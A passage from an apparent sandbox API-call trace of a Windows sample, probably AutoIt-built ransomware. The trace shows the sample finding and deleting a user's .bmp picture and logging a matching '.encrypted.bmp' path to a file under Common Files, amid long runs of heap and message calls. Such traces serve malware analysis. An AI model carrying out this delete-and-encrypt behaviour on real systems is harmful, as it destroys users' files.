lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.072] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.072] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.072] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.072] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.072] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpFilePart=0x0) returned 0x3f [0041.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x183088e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 0x7c2100 [0041.072] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\dlvzwdk.bmp")) returned 1 [0041.074] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x183088e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 0 [0041.074] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.074] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.076] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.076] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.076] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.077] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.077] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.077] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.077] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.077] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.078] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.078] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.078] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.078] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.078] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.079] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x300b, lpOverlapped=0x0) returned 1 [0041.079] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.079] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x300b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.079] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.encrypted.bmp\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0041.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f36e0 [0041.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.encrypted.bmp\r\n", cchWideChar=76, lpMultiByteStr=0x7f36e0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 76 [0041.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.080] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x4b, lpOverlapped=0x0) returned 1 [0041.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.080] CloseHandle (hObject=0x140) returned 1 [0041.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.082] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.083] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.084] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.084] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.084] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.084] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.084] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, 